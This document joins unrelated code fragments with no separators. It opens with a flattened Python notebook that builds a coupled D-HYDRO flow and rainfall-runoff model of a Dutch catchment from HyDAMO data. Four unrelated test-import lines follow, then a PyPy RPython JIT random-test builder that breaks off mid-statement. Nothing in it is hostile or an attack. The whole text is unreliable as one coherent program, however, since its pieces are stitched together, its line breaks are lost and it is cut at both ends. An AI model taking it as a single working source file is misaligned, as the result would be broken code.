clip=hydamo.clipgeo) hydamo.pumps.read_gml(pad+'gml/pomp.gml', index_col='code', clip=hydamo.clipgeo) hydamo.pumps.snap_to_branch(hydamo.branches, snap_method='overal', maxdist=5) hydamo.pumps['maximalecapaciteit'] *= 60 hydamo.sturing.read_gml(pad+'gml/sturing.gml', index_col='code') # Plot the model with branches, cross sections and structures. Note that compound structures are not plotted here as they do not have a geometry on their own; they are composed from their sub-structures that do have a geometry and are plotted here. # In[4]: plt.rcParams['axes.edgecolor'] = 'w' fig, ax = plt.subplots(figsize=(10, 10)) ax.fill(*hydamo.clipgeo.exterior.xy, color='w', alpha=0.5) ax.xaxis.set_visible(False) ax.yaxis.set_visible(False) ax.set_xlim(139600, 142400) ax.set_ylim(391700, 395600) achtergrond = plt.imread(pad+'gis/achtergrond.png') ax.imshow(achtergrond, extent=(139517.12, 142957.76, 391606.8, 395907.6), interpolation='lanczos') hydamo.branches.plot(ax=ax, label='Channel') hydamo.crosssections.plot(ax=ax, color='C3', label='Cross section') hydamo.culverts.centroid.plot(ax=ax, color='darkgreen', label='Culvert', markersize=20, zorder=10) hydamo.weirs.centroid.plot(ax=ax, color='C1', label='Weir', markersize=25, zorder=10) hydamo.bridges.plot(ax=ax,color='red',label='Bridge',markersize=20,zorder=10) hydamo.orifices.plot(ax=ax,color='black',label='Orifice',markersize=20,zorder=10) hydamo.pumps.plot( ax=ax, color='C4', label='Pump', marker='s', markersize=125, zorder=10, facecolor='none', linewidth=2.5) ax.legend() fig.tight_layout() # ### Generate the D-HYDRO FM schematisation # #### Create the 1D network # Convert the geometries to D-HYDRO schematisation: # # Start with importing the structures (from HyDAMO in this case), since the position of the structure can be used in defining the position of the 1d nodes. # # Structures can also be added without the HyDAMO imports. One weir is added manually, but this can be done for all implemented structures. # # Note that for importing most structures multiple gml-files are needed. For more info on how to add structures (directly or from HyDAMO), see: https://hkvconfluence.atlassian.net/wiki/spaces/DHYD/overview. # # - for weirs, a corresponding profile is looked up in the crossections. If one is found (either a YZ or a parametrised profile) the weir is implemented as a universal weir. If it is not found, a regular (rectangular) weir will be used. The cross-section should contain a 'codegeralateerdobject' containing the ID of the universal weir. # - culverts can also use an 'afsluitmiddel'; if one is coupled for a specific culvert and its type is 5 (terugslagklep) the flow direction is set 'positive' instead of 'both'. # - bridges need an associated crosssection (through the field 'codegerelateerdobject' in the cross-section); this can be either 'YZ' or 'parametrised'. The profiles are then processed so a suitable cross-section for a bridge is created; # - pumps are composed from 'gemalen', 'pompen' and 'sturing'. # # In most cases, these 'extra' arguments are optional, i.e. they are not required and can be left out. Some are required: # - pumps really need all 3 objects (gemalen, pompen en sturing); # - bridges really need a profile (either 'crosssections' or 'parametrised_profiles' needs to contain a field 'codegerelateerdobject' that points to each bridge). # # For more info on the structure definitions one is referred to the D-Flow FM user manual: https://content.oss.deltares.nl/delft3d/manuals/D-Flow_FM_User_Manual.pdf. # # Note that orifices do not yet have an appropriate/definitive definition in HYDAMO. To be able to use it, we now use a separate GML-definition ('onderspuier") but possibly this will be integrated in the definition for weirs. To be continued. # # In[5]: dfmmodel = DFlowFMModel() # Collect structures dfmmodel.structures.io.weirs_from_hydamo(hydamo.weirs, yz_profiles=hydamo.crosssections, parametrised_profiles=hydamo.parametrised_profiles) dfmmodel.structures.io.culverts_from_hydamo(hydamo.culverts, hydamo.afsluitmiddel) dfmmodel.structures.io.bridges_from_hydamo(hydamo.bridges, yz_profiles=hydamo.crosssections, parametrised_profiles=hydamo.parametrised_profiles) dfmmodel.structures.io.orifices_from_hydamo(hydamo.orifices) dfmmodel.structures.io.pumps_from_hydamo(pompen=hydamo.pumps, sturing=hydamo.sturing, gemalen=hydamo.gemalen) # Add a weir manually (equivalent functions exist for all structures): dfmmodel.structures.add_weir( id='extra_weir', branchid='riv_RS1_1810', chainage=950.0, crestlevel=8.00, crestwidth=7.5, corrcoeff=1.0 ) # Compound structures are composed of other structures and will not be implemented as such in HyDAMO. D-Flow FM simply needs an ID for every compound structure and a list of structures it should be composed of. They should be snapped to the same branch but not necessarily to the exact same location. # # To use, provide a list of ID's of compound structures, and along with, for every compound structure, a nested list of sub-structures. If there are many, these can be read from files (for example). # In[6]: cmpnd_ids = ['cmpnd_1','cmpnd_2'] cmpnd_list = [['Orifice_Test1','UWeir_Test2'], ['UWeir_Test2','RS1-KBR31']] dfmmodel.structures.io.compound_structures(cmpnd_ids, cmpnd_list) # After this add the branches and generate a grid. # In[7]: # Create a 1D schematisation dfmmodel.network.set_branches(hydamo.branches) dfmmodel.network.generate_1dnetwork(one_d_mesh_distance=40.0, seperate_structures=True) # Add cross sections. Here two hydamo files are used. First the imported cross sections. If after this there are branch objects left without a cross sections, it is derived from the norm parametrised profile (Dutch: legger). # In[8]: # Add cross sections from hydamo dfmmodel.crosssections.io.from_hydamo( dwarsprofielen=hydamo.crosssections, parametrised=hydamo.parametrised_profiles, branches=hydamo.branches ) print(f'{len(dfmmodel.crosssections.get_branches_without_crosssection())} branches are still missing a cross section.') print(f'{len(dfmmodel.crosssections.get_structures_without_crosssection())} structures are still missing a cross section.') # If there are still missing cross sections left, add a default one. To do so add a cross section definition, and assign it with a vertical offset (shift). # In[9]: # Set a default cross section default = dfmmodel.crosssections.add_rectangle_definition( height=5.0, width=5.0, closed=False, roughnesstype='Strickler', roughnessvalue=30) dfmmodel.crosssections.set_default_definition(definition=default, shift=5.0) # #### Add a 2D mesh # To add a mesh, currently 2 options exist: # 1) the converter can generate a relatively simple, rectangular mesh, with a rotation or refinement. Note that rotation _and_ refinement is currently not possible. In the section below we generate a refined 2D mesh with the following steps: # # - Generate grid within a polygon. The polygon is the extent given to the HyDAMO model. # - Refine along the main branch # - Determine altitude from a DEM. # In[10]: # Create mesh object mesh = Rectangular() cellsize = 25 # Generate mesh within model bounds mesh.generate_within_polygon(hydamo.clipgeo, cellsize=cellsize, rotation=0) # Refine the model (2 steps) along the main branch. To do so we generate a buffer around the main branch. buffered_branch = hydamo.branches.loc[['riv_RS1_1810', 'riv_RS1_264'], 'geometry'].unary_union.buffer(10) mesh.refine(polygon=[buffered_branch], level=[2], cellsize=cellsize) # Determine the altitude from a digital elevation model # rasterpath = '../gis/AHNdommel_clipped.tif' # mesh.altitude_from_raster(rasterpath) # The full DEM is not added to this notebook. Instead a constant bed level is used mesh.altitude_constant(15.0) # Add to schematisation dfmmodel.network.add_mesh2d(mesh) # 2) a more complex mesh can be created in other software (such as SMS) and then imported in the converter: (uncomment to activate) # In[11]: #from dhydamo.core.mesh2d import Mesh2D #mesh = Mesh2D() # import the geometry #mesh.geom_from_netcdf(r'T:\2Hugo\Grid_Roer_net.nc') # fill every cell with an elevation value #mesh.altitude_from_raster(rasterpath) # and add to the model #dfmmodel.network.add_mesh2d(mesh) # #### Add the 1D-2D links # For linking the 1D and 2D model, three options are available: # 1. Generating links from each 1d node to the nearest 2d node. # 2. Generating links from each 2d node to the nearest 1d node (intersecting==True) # 3. Generating links from each 2d node to the nearest 1d node, while not allowing the links to intersect other cells (intersecting==True). # # Intersecting indicates whether or not the 2D cells cross the 1D network (lateral versus embedded links). # So, option 3 is relevant when there is no 2d mesh on top of the 1d mesh: the lateral links. # # Note that for each option a maximum link length can be chosen, to prevent creating long (and perhaps unrealistic) links. # In[12]: del dfmmodel.network.links1d2d.faces2d[:] del dfmmodel.network.links1d2d.nodes1d[:] dfmmodel.network.links1d2d.generate_1d_to_2d(max_distance=50) # In[13]: fig, ax = plt.subplots(figsize=(13, 10)) ax.set_aspect(1.0) segments = dfmmodel.network.mesh2d.get_segments() ax.add_collection(LineCollection(segments, color='0.3', linewidths=0.5, label='2D-mesh')) links = dfmmodel.network.links1d2d.get_1d2dlinks() ax.add_collection(LineCollection(links, color='k', linewidths=0.5)) ax.plot(links[:, :, 0].ravel(), links[:, :, 1].ravel(), color='k', marker='.', ls='', label='1D2D-links') for i, p in enumerate([buffered_branch]): ax.plot(*p.exterior.xy, color='C3', lw=1.5, zorder=10, alpha=0.8, label='Refinement buffer' if i==0 else None) hydamo.branches.plot(ax=ax, color='C0', lw=2.5, alpha=0.8, label='1D-mesh') ax.legend() ax.set_xlim(140900, 141300) ax.set_ylim(393400, 393750); # ### Boundary conditions for FM # # Add boundary conditions to external forcings from a SOBEK time series. # In[14]: bcs = pd.read_csv(pad+'sobekdata/boundaryconditions.csv', sep=';', index_col=0) bcs.index = pd.to_datetime(bcs.index) # In[15]: dfmmodel.external_forcings.add_boundary_condition( name='BC_flow_in', pt=(140712.056047, 391893.277878), bctype='discharge', series=bcs['Discharge'] ) dfmmodel.external_forcings.add_boundary_condition( name='BC_wlev_down', pt=(141133.788766, 395441.748424), bctype='waterlevel', series=bcs['Waterlevel'] ) # In[16]: fig, ax = plt.subplots() ax.plot( dfmmodel.external_forcings.boundaries['BC_flow_in']['time'], dfmmodel.external_forcings.boundaries['BC_flow_in']['value'], label='Discharge [m3/s]' ) ax.plot( dfmmodel.external_forcings.boundaries['BC_wlev_down']['time'], dfmmodel.external_forcings.boundaries['BC_wlev_down']['value'], label='Water level [m+NAP]' ) ax.set_ylabel('Value (discharge or waterlevel)') ax.set_xlabel('Time [minutes]') ax.legend(); # In[17]: # Initial water depth is set to 0.5 m dfmmodel.external_forcings.set_initial_waterdepth(0.5) # Lateral flow can be obtained from the coupling with the RR-model, or by providing time series. Here, these are read from a Sobek model. In the coupling below, nodes that are not linked to a RR-boundary node are assumed to have a prescribed time series. # # If a DFM-model is run offline, timeseries should be provided for all laterals. # In[18]: ###For adding the lateral inflow we import SOBEK results. To do so we use hkvsobekpy. For more info on this module, see: https://github.com/HKV-products-services/hkvsobekpy # # Add the lateral inflows also from the SOBEK results. Naote that the column names in the his-file need to match # # the id's of the imported lateral locations at the top of this notebook. rehis = hkvsobekpy.read_his.ReadMetadata(pad+'sobekdata/QLAT.HIS', hia_file='auto') param = [p for p in rehis.GetParameters() if 'disch' in p][0] lateral_discharge = rehis.DataFrame().loc[:, param] lateral_discharge.drop('lat_986', inplace=True, axis=1) # ### Generating the RR-model # Catchments are provided as HyDAMO files and are read similarly as the FM files are. They can be GML or shape files. Note that in case of shapefiles column mapping is necessary because the column names are truncated. Required columns include 'code' as the ID and 'lateraleknoopcode' as the associated FM boundary node ID. Furthermore, the attribute 'check_geotype' needs to be set. Default is true; and then the reading will file if the file contains 'MultiPolygon' objects. By disabling the check, these objects will be skipped. # # For every catchment, the land use areas will be calculated and if appopriate a maximum of four RR-nodes will be created per catchment: # - unpaved (based on the Ernst concept) # - paved # - greenhouse # - open water (not the full Sobek2 open water, but only used to transfer (net) precipitation that falls on open water that is schematized in RR to the 1D/2D network. # # At the moment, two options exist for the schematisation of the paved area: # 1) simple: the paved fraction of each catchment is modelled with a paved node, directly connected to catchments' boundary node # <br> # 2) more complex: serer area polygons and overflow points are used a input as well. For each sewer area, the paved areas in the intersecting catchments are summed. This total area is then distributed over the overflows that are associated with the sewerarea (the column 'lateraleknoopcode') using the area fraction (column 'fractie') for each overflow. In each cathment, paved area that does not intersect with a sewer area gets an unpaved node as in option (1). # In[19]: # RR-catchments hydamo.catchments.read_shp(pad+'gml/afvoergebied_2.shp', index_col='code', clip=None, check_geotype=False, column_mapping={'lateralekn' : 'lateraleknoopcode', 'administra':'administratiefgebied'}) # Optionally, read also sewer areas and overflow locations. If sewer-areas are used, there must also be overflows and vice versa. # In[20]: hydamo.sewer_areas.read_shp(pad+'gml/rioleringsgebieden.shp', index_col='code',clip=None, check_geotype=False) hydamo.overflows.read_shp(pad+'gml/overstorten.shp', index_col='code', clip=None, column_mapping={'codegerel':'codegerelateerdobject', 'Naam':'name' }) # snap the overflows to 1D branches hydamo.overflows.snap_to_branch(hydamo.branches, snap_method='overal', maxdist= 5) # Other input data for RR can be fed by rasters (from which zonal statistics will be extracted) or spatially uniform default values. Three rasters are required: land use, soil type and surface elevation. For each land use type, the area within each catchment is calculated. Surface level is calculated as the median within the catchment, and the most-occurring soil type is used. In all rasters, a NODATA-value of -999 should be used. # #### Boundary nodes # Boundary nodes are assumed to be also included in the FM-model. For every catchment, the boundary identified by 'lateraleknoopocode' in the catchment definitition, is assumed to exist in the laterals. The coordinates are included in the topology of the model as follows: # An RR-model must first be initialized: # In[21]: drrmodel = DFlowRRModel() # And the necessary (i.e. the one with a catchment associated to them) lateral nodes are also load into the RR model. Overflows are optional and can be left out. # In[22]: drrmodel.external_forcings.io.boundary_from_input(hydamo.laterals, hydamo.catchments, overflows=hydamo.overflows) # Eventually, water levels can be read from 1D grid points. For now, an observation point is needed for RR to read water levels from. We add an obseration point for each boundary with a catchment, with an offset of 1 m horizontally and vertically. The new point is then snapped to the branche. # In[23]: names = [] points = [] from shapely.geometry import Point for i in drrmodel.external_forcings.boundary_nodes.items(): names.append('obs_'+i[1]['id']) points.append(Point((float(i[1]['px'])+1.,float(i[1]['py'])+1.))) dfmmodel.observation_points.add_points(points, names, snap_to_1d=True) # dfmmodeling RR and FM must be online. RR reades waterlevels from FM observation points and FM gets discharges from lateral nodes of discharge type 'realtime'. In the call to the function, the overflow locations are appended to the regular lateral locations, so they will be treated the same. # In[24]: dfmmodel.external_forcings.io.read_laterals(hydamo.laterals.append(hydamo.overflows), lateral_discharges=lateral_discharge, rr_boundaries=drrmodel.external_forcings.boundary_nodes) # #### Unpaved nodes # The coding for the land use types needs to be as follows:<br> # 1 potatoes <br> # 2 wheat<br> # 3 sugar beet<br> # 4 corn <br> # 5 other crops <br> # 6 bulbous plants<br> # 7 orchard<br> # 8 grass <br> # 9 deciduous forest <br> # 10 coniferous forest<br> # 11 nature<br> # 12 barren<br> # 13 open water<br> # 14 built-up<br> # 15 greenhouses<br> # # For classes 1-12, the areas are calculated from the provided raster and remapped to the classification in the Sobek RR-tables. # # # The coding for the soil types:<br> # 1 'Veengrond met veraarde bovengrond'<br> # 2 'Veengrond met veraarde bovengrond, zand'<br> # 3 'Veengrond met kleidek'<br> # 4 'Veengrond met kleidek op zand'<br> # 5 'Veengrond met zanddek op zand'<br> # 6 'Veengrond op ongerijpte klei'<br> # 7 'Stuifzand'<br> # 8 'Podzol (Leemarm, fijn zand)'<br> # 9 'Podzol (zwak lemig, fijn zand)'<br> # 10 'Podzol (zwak lemig, fijn zand op grof zand)'<br> # 11 'Podzol (lemig keileem)'<br> # 12 'Enkeerd (zwak lemig, fijn zand)'<br> # 13 'Beekeerd (lemig fijn zand)'<br> # 14 'Podzol (grof zand)'<br> # 15 'Zavel'<br> # 16 'Lichte klei'<br> # 17 'Zware klei'<br> # 18 'Klei op veen'<br> # 19 'Klei op zand'<br> # 20 'Klei op grof zand'<br> # 21 'Leem'<br> # # # And surface elevation needs to be in cm+NAP. # In[25]: # all data and settings to create the RR-model lu_file = pad+'rasters/lgn250.tif' ahn_file = pad+'rasters/ahn_250_cm.tif' soil_file = pad+'rasters/soiltypes250.tif' # Other parameters can be set by rasters (i.e. spatially distributed) or uniform. If a number is provided, the module will use this number for all catchments, if a string is provided it is interpreted as a raster file name. For unpaved nodes, these parameters are the storage on the surface, the infiltration capacity, and the initial ground water depth (in m below the surface). The parametrisation for Ernst is taken from a list of layer depths, where each depth is assigned the corresponding resistance from the list of layer_resistances. They need to be of equal length. # In[26]: surface_storage = 10.0 infiltration_capacity = 100.0 initial_gwd = 0.4 layer_depths = [0.0, 1.0, 2.0] layer_resistances = [30,200,10000] # Fill the unpaved node with the corresponding ernst definition as follows. # # The argument 'meteo_areas' to 'unpaved_from_input' contains the polygons that correspond to a meteo-station: here these are identical to each catchment so each catchment gets its own station. If there are many, small, catchments, it might be more appropriate to use, for instance, Thiessen polygons around gauges. For each catchment, the meteo-station is based on the 'meteo-area;-feature in which the centroid of the catchment falls. # # The argument 'zonalstats_alltouched' is rather important. It defines the number of cells in the input rasters that are taken into account for each catchment. If the raster resolution is sufficiently high, its setting does not matter. In the case of coarse rasters, small catchments might end up with no nodes at all if the 'zonalstats_alltouched' is FALSE - it says that only cells that are entirely within the catchment are taken into account. If it TRUE, all cells that are touched by the catchment are taken into account - i.e. some pixels might be counted multiple times. Note that to define average fluxes (meteo, seepage, storages) zonalstats_alltouched is TRUE by default. For elevation, land use and soil types it is FALSE by default, if the argument is omitted. # In[27]: meteo_areas = hydamo.catchments # In[28]: drrmodel.unpaved.io.unpaved_from_input(hydamo.catchments, lu_file, ahn_file, soil_file, surface_storage, infiltration_capacity, initial_gwd, meteo_areas, zonalstats_alltouched=True) drrmodel.unpaved.io.ernst_from_input(hydamo.catchments, depths=layer_depths, resistance=layer_resistances) # #### Paved # Input for the paved nodes are land use -the area of the paved node is the area of class '14' in the provided land use map- and surface elevation. In addition, the following parameters can all be numbers (spatially uniform) or raster filenames: # - storage on the street <br> # - storage in the sewer system <br> # - capacity of the sewerpumps <br> # # The meteo-station is assigned in the same way as for unpaved nodes. # In[29]: street_storage = 10.0 sewer_storage = pad+'rasters/sewstor.tif' pumpcapacity = pad+'rasters/pumpcap.tif' # To convert to a model definition, according to the more complex schematistion: # In[30]: drrmodel.paved.io.paved_from_input(catchments=hydamo.catchments, overflows=hydamo.overflows, sewer_areas=hydamo.sewer_areas, landuse=lu_file, surface_level=ahn_file, street_storage=street_storage, sewer_storage=sewer_storage, pump_capacity=pumpcapacity, meteo_areas=meteo_areas, zonalstats_alltouched=True) Or, according to the simplest approach: # In[31]: # drrmodel.paved.io.paved_from_input(catchments=hydamo.catchments, # landuse=lu_file, # surface_level=ahn_file, # street_storage=street_storage, # sewer_storage=sewer_storage, # pump_capacity=pumpcapacity, # meteo_areas=meteo_areas) # #### Greenhouse nodes # Input for the greenhouse nodes are (again) land use -the area of the paved node is the area of class '15' in the provided land use map- and surface elevation. In addition, the following parameter can be a number (spatially uniform) or a raster filename: # - storage on the roof <br> # # The meteo-station is assigned in the same way as for unpaved nodes. # In[32]: roof_storage = pad+'rasters/roofstor.tif' # To convert to a model definition: # In[33]: drrmodel.greenhouse.io.greenhouse_from_input(hydamo.catchments, lu_file, ahn_file, roof_storage, meteo_areas, zonalstats_alltouched=True) # #### Open water # Input for the open water nodes are only land use -the area of the paved node is the area of class '13' in the provided land use map. # # The meteo-station is assigned in the same way as for unpaved nodes. # In[34]: drrmodel.openwater.io.openwater_from_input(hydamo.catchments, lu_file, meteo_areas, zonalstats_alltouched=True) # #### External forcings # # Three types of external forcing need to be provided:<br> # - Seepage/drainage # - Precipitation # - Evaporation # # All are assumed to be spatially variable and thus need to pe provided as rasters per time step. Only the locations of the folders containing the rasters need to be provided; the time step is then derived from the file names. # # All fluxes are assumed to be in mm/d. As for evaporation only one meteostation is used, the meteo_areas are dissolved to a user-defined field that should be available in the table. # # Rastertypes can be any type that is recognized by rasterio (in any case Geotiff and ArcASCII rasters). If the file extension is 'IDF', as is the case in Modflow output, the raster is read using the 'imod'-package. # # In[35]: seepage_folder = pad+'rasters/kwel' precip_folder = pad+'rasters/precip' evap_folder = pad+'rasters/evap' # In[36]: drrmodel.external_forcings.io.seepage_from_input(hydamo.catchments, seepage_folder) drrmodel.external_forcings.io.precip_from_input(meteo_areas, precip_folder) drrmodel.external_forcings.io.evap_from_input(meteo_areas, evap_folder, dissolve_field='administratiefgebied') # We need a function to be able to easily plot all nodes and links # In[37]: def node_geometry(dict): # Function to put the node geometries in geodataframes from shapely.geometry import Point geoms = [] links = [] for i in dict.items(): if 'ar' in i[1]: if np.sum([float(s) for s in i[1]['ar'].split(' ')])>0: geoms.append(Point((float(i[1]['px']),float(i[1]['py'])))) links.append(LineString((Point(float(i[1]['px']),float(i[1]['py'])), Point(float(drrmodel.external_forcings.boundary_nodes[i[1]['boundary_node']]['px']), float(drrmodel.external_forcings.boundary_nodes[i[1]['boundary_node']]['py']))))) else: geoms.append(Point((float(i[1]['px']),float(i[1]['py'])))) return((gpd.GeoDataFrame(geoms,columns=['geometry'])),gpd.GeoDataFrame(links,columns=['geometry'])) # Now all the nodes are filled. The topology is defined as follows: every catchment gets a maximum of four nodes (unpaved, paved, open water and greenhouse). If in the land use map, the appropriate land use does not occur in the catchment, no node is defined. The four nodes are plotted on a horizontal (west-east) line around the catchment centroid in the order of: openwater, unpaved, paved, greenhouse. Every node is connected with the lateral node of the catchnment using a RR-link. The files 3B_NOD.TP and 3B_LINK.TP are created describing this. # In[38]: ## plt.rcParams['axes.edgecolor'] = 'w' import matplotlib.patches as mpatches fig, ax = plt.subplots(figsize=(10, 10)) ax.xaxis.set_visible(False) ax.yaxis.set_visible(False) ax.set_xlim(139600, 142400) ax.set_ylim(391700, 395600) achtergrond = plt.imread(pad+'gis/achtergrond.png') ax.imshow(achtergrond, extent=(139517.12, 142957.76, 391606.8, 395907.6), interpolation='lanczos') hydamo.catchments.plot(ax=ax,label='Catchments', edgecolor='black', facecolor="pink", alpha=0.5) hydamo.branches.plot(ax=ax, label='Channel') node_geometry(drrmodel.unpaved.unp_nodes)[0].plot(ax=ax,markersize=15,color='green',label='Unpaved') node_geometry(drrmodel.unpaved.unp_nodes)[1].plot(ax=ax, color='black',linewidth=0.5) node_geometry(drrmodel.paved.pav_nodes)[0].plot(ax=ax,markersize=15,color='red',label='Paved') node_geometry(drrmodel.paved.pav_nodes)[1].plot(ax=ax, color='black',linewidth=0.5) node_geometry(drrmodel.greenhouse.gh_nodes)[0].plot(ax=ax,markersize=15,color='yellow',label='Greenhouse') node_geometry(drrmodel.greenhouse.gh_nodes)[1].plot(ax=ax, color='black',linewidth=0.5) node_geometry(drrmodel.openwater.ow_nodes)[0].plot(ax=ax,markersize=15,color='blue',label='Openwater') node_geometry(drrmodel.external_forcings.boundary_nodes)[0].plot(ax=ax, markersize=15, color='purple',label='RR Boundary') node_geometry(drrmodel.openwater.ow_nodes)[1].plot(ax=ax, color='black',linewidth=0.5,label='RR-link') # manually add handles for polygon plot handles, labels = ax.get_legend_handles_labels() poly = mpatches.Patch(facecolor='pink', edgecolor='black',alpha=0.5) ax.legend(handles=handles.append(poly),labels=labels.append('Catchments')) fig.tight_layout() # ### Settings and writing # # Finally, we adjust some settings and export the coupled FM-RR model. For more info on the settings: https://content.oss.deltares.nl/delft3d/manuals/D-Flow_FM_User_Manual.pdf # # The 1D/2D model (FM) is written to the sub-folder 'fm'; RR-files are written to 'rr'. An XML-file (dimr-config.xml) describes the coupling between the two. Note that both the GUI and Interaktor do not (yet) support RR, so the only way to carry out a coupled simulation is using DIMR. # # In[39]: # Runtime and output settings # for FM model dfmmodel.mdu_parameters['refdate'] = 20000101 dfmmodel.mdu_parameters['tstart'] = 0.0 * 3600 dfmmodel.mdu_parameters['tstop'] = 24.0 * 1 * 3600 dfmmodel.mdu_parameters['hisinterval'] = '120. 0. 0.' dfmmodel.mdu_parameters['cflmax'] = 0.7 # for RR model drrmodel.d3b_parameters['Timestepsize'] = 300 drrmodel.d3b_parameters['StartTime'] = '2000/01/01;00:00:00' drrmodel.d3b_parameters['EndTime'] = '2000/01/02;00:00:00' drrmodel.d3b_parameters['RestartIn'] = 0 drrmodel.d3b_parameters['RestartOut'] = 0 drrmodel.d3b_parameters['RestartFileNamePrefix'] ='Test' drrmodel.dimr_path = r'c:\users\hurkmans\appdata\local\continuum\anaconda3\lib\site-packages\delft3dfmpy\data\x64\dimr\scripts\run_dimr.bat' # Create writer fm_writer = DFlowFMWriter(dfmmodel, output_dir=pad+'testmodel', name='moergestels_broek') rr_writer = DFlowRRWriter(drrmodel, output_dir=pad+'testmodel', name='moergestels_broek') # Write as model # The ldb is just for visualising in the interaktor - there is no RR component there. fm_writer.objects_to_ldb() fm_writer.write_all() rr_writer.write_all() # Finished! Start the coupled model by clicking run.bat in the output model. # In[ ]:
from test.job_parameters.test_load_job_parameters import TestLoadJobParameters from test.job_parameters.test_flatten_parameter_dictionary import TestFlattenParameterDictionary from test.job_parameters.test_log_param import TestLogParam from test.job_parameters.test_log_params import TestLogParams
from __future__ import print_function import py from rpython.rtyper.lltypesystem import lltype, llmemory, rffi, rstr from rpython.rtyper import rclass from rpython.jit.backend.test import test_random from rpython.jit.backend.test.test_random import getint, getref_base, getref from rpython.jit.metainterp.resoperation import ResOperation, rop, optypes from rpython.jit.metainterp.history import ConstInt, ConstPtr, getkind from rpython.jit.metainterp.support import ptr2int from rpython.jit.codewriter import heaptracker from rpython.jit.codewriter.effectinfo import EffectInfo from rpython.rtyper.annlowlevel import llhelper from rpython.rlib.rarithmetic import intmask from rpython.rtyper.llinterp import LLException class LLtypeOperationBuilder(test_random.OperationBuilder): HAVE_SHORT_FIELDS = False def __init__(self, *args, **kw): test_random.OperationBuilder.__init__(self, *args, **kw) self.vtable_counter = 0 # note: rstrs and runicodes contain either new local strings, or # constants. In other words, all BoxPtrs here were created earlier # by the trace before, and so it should be kind of fine to mutate # them with strsetitem/unicodesetitem. self.rstrs = [] self.runicodes = [] self.structure_types = [] self.structure_types_and_vtables = [] def fork(self, cpu, loop, vars): fork = test_random.OperationBuilder.fork(self, cpu, loop, vars) fork.structure_types = self.structure_types fork.structure_types_and_vtables = self.structure_types_and_vtables return fork def _choose_ptr_vars(self, from_, type, array_of_structs): ptrvars = [] for i in range(len(from_)): v, S = from_[i][:2] if not isinstance(S, type): continue if ((isinstance(S, lltype.Array) and isinstance(S.OF, lltype.Struct)) == array_of_structs): ptrvars.append((v, S)) return ptrvars def get_structptr_var(self, r, must_have_vtable=False, type=lltype.Struct, array_of_structs=False): while True: ptrvars = self._choose_ptr_vars(self.ptrvars, type, array_of_structs) if ptrvars and r.random() < 0.8: v, S = r.choice(ptrvars) else: prebuilt_ptr_consts = self._choose_ptr_vars( self.prebuilt_ptr_consts, type, array_of_structs) if prebuilt_ptr_consts and r.random() < 0.7: v, S = r.choice(prebuilt_ptr_consts) else: if type is lltype.Struct: # create a new constant structure must_have_vtable = must_have_vtable or r.random() < 0.5 p = self.get_random_structure(r, has_vtable=must_have_vtable) else: # create a new constant array p = self.get_random_array(r, must_be_array_of_structs=array_of_structs) S = lltype.typeOf(p).TO v = ConstPtr(lltype.cast_opaque_ptr(llmemory.GCREF, p)) self.prebuilt_ptr_consts.append((v, S, self.field_values(p))) if not (must_have_vtable and S._names[0] != 'parent'): break return v, S def get_arrayptr_var(self, r): return self.get_structptr_var(r, type=lltype.Array) def get_random_primitive_type(self, r): rval = r.random() if rval < 0.25: TYPE = lltype.Signed elif rval < 0.5: TYPE = lltype.Char elif rval < 0.75: TYPE = rffi.UCHAR else: TYPE = rffi.SHORT if not self.HAVE_SHORT_FIELDS: TYPE = lltype.Signed return TYPE def get_random_structure_type(self, r, with_vtable=None, cache=True, type=lltype.GcStruct): if cache and self.structure_types and r.random() < 0.5: return r.choice(self.structure_types) fields = [] kwds = {} if with_vtable: fields.append(('parent', rclass.OBJECT)) kwds['hints'] = {'vtable': with_vtable._obj} for i in range(r.randrange(1, 5)): if r.random() < 0.1: kind = 'r' TYPE = llmemory.GCREF else: kind = 'i' TYPE = self.get_random_primitive_type(r) fields.append(('%s%d' % (kind, i), TYPE)) S = type('S%d' % self.counter, *fields, **kwds) self.counter += 1 if cache: self.structure_types.append(S) return S def get_random_structure_type_and_vtable(self, r): if self.structure_types_and_vtables and r.random() < 0.5: return r.choice(self.structure_types_and_vtables) vtable = lltype.malloc(rclass.OBJECT_VTABLE, immortal=True) vtable.subclassrange_min = self.vtable_counter vtable.subclassrange_max = self.vtable_counter self.vtable_counter += 1 S = self.get_random_structure_type(r, with_vtable=vtable, cache=False) name = S._name heaptracker.set_testing_vtable_for_gcstruct(S, vtable, name) self.structure_types_and_vtables.append((S, vtable)) # return S, vtable def get_random_structure(self, r, has_vtable=False): if has_vtable: S, vtable = self.get_random_structure_type_and_vtable(r) p = lltype.malloc(S) p.parent.typeptr = vtable else: S = self.get_random_structure_type(r) p = lltype.malloc(S) for fieldname in lltype.typeOf(p).TO._names: if fieldname != 'parent': TYPE = getattr(S, fieldname) setattr(p, fieldname, rffi.cast(TYPE, r.random_integer())) return p def get_random_array_type(self, r, can_be_array_of_struct=False, must_be_array_of_structs=False): if ((can_be_array_of_struct and r.random() < 0.1) or must_be_array_of_structs): TYPE = self.get_random_structure_type(r, cache=False, type=lltype.Struct) else: TYPE = self.get_random_primitive_type(r) return lltype.GcArray(TYPE) def get_random_array(self, r, must_be_array_of_structs=False): A = self.get_random_array_type(r, must_be_array_of_structs=must_be_array_of_structs) length = (r.random_integer() // 15) % 300 # length: between 0 and 299 # likely to be small p = lltype.malloc(A, length) if isinstance(A.OF, lltype.Primitive): for i in range(length): p[i] = rffi.cast(A.OF, r.random_integer()) else: for i in range(length): for fname, TP in A.OF._flds.items(): setattr(p[i], fname, rffi.cast(TP, r.random_integer())) return p def get_index(self, length, r): if length == 0: raise test_random.CannotProduceOperation v_index = r.choice(self.intvars) if not (0 <= getint(v_index) < length): v_index = ConstInt(r.random_integer() % length) return v_index def field_values(self, p): dic = {} S = lltype.typeOf(p).TO if isinstance(S, lltype.Struct): for fieldname in S._names: if fieldname != 'parent': dic[fieldname] = getattr(p, fieldname) else: assert isinstance(S, lltype.Array) if isinstance(S.OF, lltype.Struct): for i in range(len(p)): item = p[i] s1 = {} for fieldname in S.OF._names: s1[fieldname] = getattr(item, fieldname) dic[i] = s1 else: for i in range(len(p)): dic[i] = p[i] return dic def print_loop_prebuilt(self, names, writevar, s): written = {} for v, S, fields in self.prebuilt_ptr_consts: if S not in written: print(' %s = lltype.GcStruct(%r,' % (S._name, S._name), file=s) for name in S._names: if name == 'parent': print(" ('parent', rclass.OBJECT),", file=s) else: print(' (%r, lltype.Signed),'%(name,), file=s) print(' )', file=s) if S._names[0] == 'parent': print(' %s_vtable = lltype.malloc(rclass.OBJECT_VTABLE, immortal=True)' % (S._name,), file=s) written[S] = True print(' p = lltype.malloc(%s)' % (S._name,), file=s) if S._names[0] == 'parent': print(' 